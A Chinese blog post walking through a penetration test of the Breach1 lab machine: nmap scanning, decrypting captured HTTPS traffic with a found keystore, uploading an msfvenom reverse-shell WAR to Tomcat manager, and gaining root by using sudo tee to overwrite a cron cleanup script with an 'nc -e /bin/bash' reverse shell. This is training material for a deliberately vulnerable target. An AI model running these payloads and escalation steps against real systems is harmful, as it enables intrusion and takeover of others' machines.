首页 > 其他分享 >一次breach1靶机的渗透测试

一次breach1靶机的渗透测试

时间:2024-06-22 15:01:41浏览次数:13  
标签:http 查看 渗透 breach1 192.168 密码 110.140 靶机 我们

1.端口扫描和信息收集

2.CMS后台信息收集

3.解密HTTPS流量

4.tomcat的后台利用

5.提权

1.端口扫描和信息收集:

首先进行主机发现,找到目标机器:

nmap -sP 192.168.110.1/24

 

找到目标机器,进行端口扫描:

nmap -T4 -A -v 192.168.110.140

一共扫到996个开放的端口,正好里面有一个HTTP服务,我们在网页打开看一下:

打开源码发现一个加密的东西,应该是MD5,

解密得到:pgibbons:damnitfeel$goodtobeagang$ta

这看起来像是一个账号和密码

我们继续找一些有用的信息,又发现了一个CMS的管理后台

我们对最初的目录进行目录扫描,看有没有什么遗漏的东西:

dirb http://192.168.110.140

打开看一下:

继续扫一下CMS:

whatweb -v http://192.168.110.140/impresscms/

爆出了一些信息,到这里我们发现了部署的操作系统,但没有发现具体版本,我们可以打开msf去漏洞库看一下有没有相应的漏洞,

searchsploit impresscms

可以将后面的脚本依次利用,但没什么用

2.CMS后台信息收集

 这个后台需要登录,我们之前获得了一个可疑的登录密码,我们试一下

果然,登录成功

随便翻一下,看有没有什么有用的信息

发现一个网址,粘贴到浏览器,下载一个keystore

又发现一个网址,点击,下载一个流量包,并且上面说账号和密码都是tomcat

我们打开流量包看一下:

发现里面有HTTPS,被加密看不了,结合之前我们获得的keystore 应该是获取加密的秘钥

3.解密HTTPS流量

因为我们有一个秘钥,我们查看一下

keytool -list -keystore keystore  密码是:tomcat  (我们之前得到的)

我们生成密钥库,导出证书:

keytool -importkeystore -srckeystore D:\123\keystore -destkeystore D:\123\tomcat.p12 -deststoretype pkcs12 -srcalias tomcat

密码都是tomcat

得到了一个秘钥,我们将秘钥导入到流量包里面解密HTTPS流量

我们解密以后打开一个HTTPS的流量查看一下,正好获得了一个网址:打开

https://192.168.110.140:8443/_M@nag3Me/html

显示我们不能打开页面,因为这是一个HTTPS的页面,需要我们进行抓包操作

我们点击接收风险并且放包

我们得到了一个basic的登录页面,我们继续在流量包里面找看有没有账号密码

我们过滤一下HTTP的流量

ip.src == 192.168.110.140 || ip.dst ==192.168.110.140 and http

tomcat:Tt\5D8F(#!*u=G)4m7zB

登录试一下

成功,并且我们发现这里有一个上传点,要是war包


4.tomcat后台利用

 我们用msfvenom生成一个java的反弹连接war包,

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.128 lport=4444 -f war -o kali.war

将其移动到物理机上,我们先开启一个msf监听再上传:

开启监听: use exploit/multi/handler

set payload java/meterpreter/reverse_tcp

set LHOST 192.168.110.128

set LPORT 4444

exploit

我们上传,记住这里点击上传的时候抓包,因为浏览器会进行其他的请求操作,我们要把它过滤了,单独把木马上传上去,然后迅速的点击上传的kali 抓包放包

回显:

反弹成功

5.提权

 我们获得交互式的shell(输入有典型的回显)

 python -c 'import pty;pty. spawn("/bin/bash")'

在当前目录,我们可以进行查找:

1.搜索漏洞

2.find;ls -a

3.history

4.sudo -l    (查看可以用root执行什么权限)

5.查看操作系统版本:uname -a

6.查看password:cat /etc/passwd

看到了操作系统的版本,我们进行查找漏洞:

searchsploit 14.04 Ubuntu

没有对应的版本,我们查看一下

cat /etc/passwd

里面有一个MySQL数据库,我们可以看一下网站部署的路径,查看里面的内容,可能会有数据库连接的账号和密码

cd /var/www

打开看一下:

发现连接数据库的账号为root,密码为空,名字为impresscms

我们连接数据库:

mysql -uroot -p

查看一下数据库:

show tables;

链接上MySQL库:use mysql;

查看表:show tables;

查看:desc user

查询用户名和密码:select user,password from user; 密码可能是MD5

解出密码以后:这个密码可能是数据库的密码,也能是操作系统的登录密码

发现密码,MD5解密:thelaststraw

我们登录milton这个用户,

我们查看历史记录,发现一个用户,我们从这个入手,因为这个用户有sudo的权限

我们找密码,经过一番长时间查找,离谱的是这个密码藏在了网页的图片里面,

我们将图片下载:

wget http://192.168.110.140/images/bill.png

wget http://192.168.110.140/images/cake.jpg

wget http://192.168.110.140/images/initech.jpg

wget http://192.168.110.140/images/milton_beach.jpg

wget http://192.168.110.140/images/swingline.jpg

wget http://192.168.110.140/images/troll.gif

依次查看图片里面的内容:

strings bill.png

最后在一张图片里面发现了密码:coffeestains

我们进行登录

开始查找有用的信息

我们发现一个脚本,打开发现:

这是一个每隔三分钟清理一次其他用户部署的应用删除,那么我们可以利用这个加入一个反弹连接任务

我们查看一下可以用root权限执行的任务:

发现一个执行tee ,和修改脚本不需要密码

这里面有一个tee ,它的作用是把 tee file1 file2 ,可以把file1数据覆盖到file2中去

写一个反弹连接:

echo "nc -e /bin/bash 192.168.110.128 5555" > shell.txt

用tee 覆盖:

cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

查看一下是否成功:

cat /usr/share/cleanup/tidyup.sh

要先建立监听:

nc -lvvp 5555

最多三分钟反弹

反弹成功:

标签:http,查看,渗透,breach1,192.168,密码,110.140,靶机,我们
From: https://blog.csdn.net/2301_80116443/article/details/139881257

相关文章

  • 2024最新最全【网络安全/渗透测试】面试题汇总
    思路流程信息收集漏洞挖掘漏洞利用&权限提升清除测试数据&输出报告复测问题深信服一面:SQL注入防护为什么参数化查询可以防止sql注入SQL头注入点盲注是什么?怎么盲注?宽字节注入产生原理以及根本原因产生原理在哪里编码根本原因解决办法sql里面只有update怎么利用sql如何......
  • Mysql渗透及提权,命令执行
    查询用户selectuser()查询数据库版本selectversion()查询当前操作系统select@@version_compile_os查询读取数据库路径select@@datadir查询MYSQL安装路径select@@basedir查询plugin的路径select@@plugin_dirMysql-UDF提权https://blog.csdn.net/qq_48201589/......
  • Web渗透:XSS-DOM-based XSS
    DOM-basedXSS(基于DOM的跨站脚本攻击)是一种XSS攻击类型,其特点是恶意脚本通过操作文档对象模型(DOM)直接在客户端执行,而无需经过服务器的处理。这种攻击主要利用客户端JavaScript代码中的漏洞,使得攻击者能够在浏览器中注入并执行恶意代码。DOM的基本概念文档对象模型(DOM,Document......
  • UC2288 是一种新型、具有细胞渗透性和口服活性的 p21 衰减剂 | MedChemExpress (MCE)
    UC2288CAS:1394011-91-6品牌:MedChemExpress(MCE)存储条件:Powder:-20°C,3years;4°C,2years.Insolvent:-80°C,6months;-20°C,1month.生物活性:UC2288是一种新型、具有细胞渗透性和口服活性的 p21 衰减剂(对p21具有相对选择性的活性),它是基于索拉非尼(HY-......
  • 【网络安全的神秘世界】渗透之信息收集流程
    ......
  • Web渗透:XSS-反射型&存储型
    跨站脚本攻击(Cross-SiteScripting,XSS)是一种常见的网络安全漏洞,它允许攻击者将恶意脚本注入到网页中,其他用户在浏览这些页面时,可能会执行这些恶意脚本,从而导致各种安全问题,如窃取用户信息、会话劫持等。产生原因:XSS漏洞其实就是一个前端漏洞,产生的根本原因是未对用户输入进行......
  • cbrutekrag:一款针对SSH服务器的渗透测试工具
    关于cbrutekragcbrutekrag是一款针对SSH服务器的渗透测试工具,该工具基于C语言开发,可以帮助广大研究人员使用字典攻击来对目标SSH服务器执行渗透测试。该工具仅出于教育目的设计和开发,请在获得测试授权后再使用该工具。 工具要求libssh 工具下载广大研究人员可以使......
  • 常见的授权渗透环境
    有一些经过授权的渗透测试环境可供学习和实践使用。以下是一些常见的环境:OWASPMutillidae:这是一个免费的、开源的Web应用程序,它包含了许多故意设计的脆弱性,用于安全测试和渗透测试实践。你可以在本地安装它,并尝试发现和利用其中的安全漏洞。OWASPWebGoat:这是另一个OWASP项目,也......
  • 基础篇——Kali渗透工具初见
    基础篇——Kali渗透工具初见1.nc(netcat/ncat)nc常用于监听端口:nc-lvp6666//监听6666端口,列出详细信息也可以用于连接端口:nc192.168.118.1286666//尝试连接192.168.118.128的6666端口在渗透测试中,nc通常用于监听端口以获得正向shell或反弹shell。(1)正向shell目......
  • 域渗透之初识LM&NTLM认证过程
    目录前言LMHashNTLMHashWindows本地认证LSASS进程Mimikatz抓取明文密码Windows网络认证NetNTLMNTLMv1&NTLMv2Hash传递攻击前言LANManager和NTLANManager认证是Windows系统中的一种挑战-响应身份验证机制。LM认证是早期Windows版本中使用的一种认证协议,而NTLM是LM的改......